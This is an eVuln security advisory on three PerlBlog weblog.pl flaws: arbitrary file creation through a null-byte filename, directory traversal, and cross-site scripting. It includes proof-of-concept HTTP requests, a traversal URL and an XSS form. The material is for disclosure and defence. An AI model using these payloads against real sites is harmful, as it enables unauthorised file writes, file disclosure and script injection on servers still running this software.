Multiple Vulnerabilities in PerlBlog
Summary
- Vulnerability
- Multiple Vulnerabilities in PerlBlog
- Discovered
- 2006.02.15
- Last Update
- 2006.02.25 Exploitation code published
- ID
- EV0081
- CVE
- CVE-2006-0780 CVE-2006-0781 CVE-2006-0782
- Risk Level
- high
- Type
- Multiple Vulnerabilities
- Status
- Unpatched. No reply from developer(s)
- Vendor
- n/a
- Vulnerable Software
- PerlBlog (http://www.chronicled.org/perlblog/)
- Version
- 1.09b 1.09 1.08 - checked
- PoC/Exploit
- Available
- Solution
- Not available
- Discovered by
- Aliaksandr Hartsuyeu (eVuln.com)
Description
Multiple Vulnerabilities found in PerlBlog (http://www.chronicled.org/perlblog/) script.
1. Arbitrary file creation with user-defined data.
Vulnerable script: weblog.pl
User-defined post variables are not properly sanitized. "reply" parameter may contain arbitrary filename. weblog.pl creates a file with "name" and "body" parameter values included.
System access is possible.
2. Directory traversal vulnerability.
Vulnerable script: weblog.pl
Input parameter "month" isn't properly sanitized. This can be used to read arbitrary txt-files.
3. Cross-Site Scripting vulnerability.
Vulnerable script: weblog.pl
Post variables "name" and "email" are not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
PoC/Exploit
1. Arbitrary file creation with user-defined data.
HTTP query example:
POST /cgi-bin/perlblog/weblog.pl HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Host: [host]
Content-Length: 124
date=02/14/2006-23:33&headerfile=200505&subject=Re: Welcome!&reply=[anyfilename]%00&name=[anytext]&body=[anytext]&post=reply
2. Directory traversal vulnerability.
http://[host]/cgi-bin/perlblog/weblog.pl?month=../license
3. Cross-Site Scripting vulnerability.
<FORM NAME="forum" ACTION="http://[host]/cgi-bin/perlblog/weblog.pl" METHOD="POST">
<INPUT NAME="date" VALUE="02/14/2006-23:33">
<INPUT NAME="headerfile" VALUE="200505">
<INPUT NAME="subject" VALUE="Re: Welcome!">
<INPUT NAME="reply" VALUE="1">
<INPUT NAME="post" VALUE="reply">
<INPUT TYPE="TEXT" NAME="name" value='[XSS]'>
<INPUT TYPE="TEXT" NAME="email" value='">[XSS]'>
<TEXTAREA></TEXTAREA>
<INPUT TYPE="Submit" VALUE="Post Comment">
</FORM>
Solution.
Solution for "Multiple Vulnerabilities in PerlBlog" is not available. Check vendor's website for updates.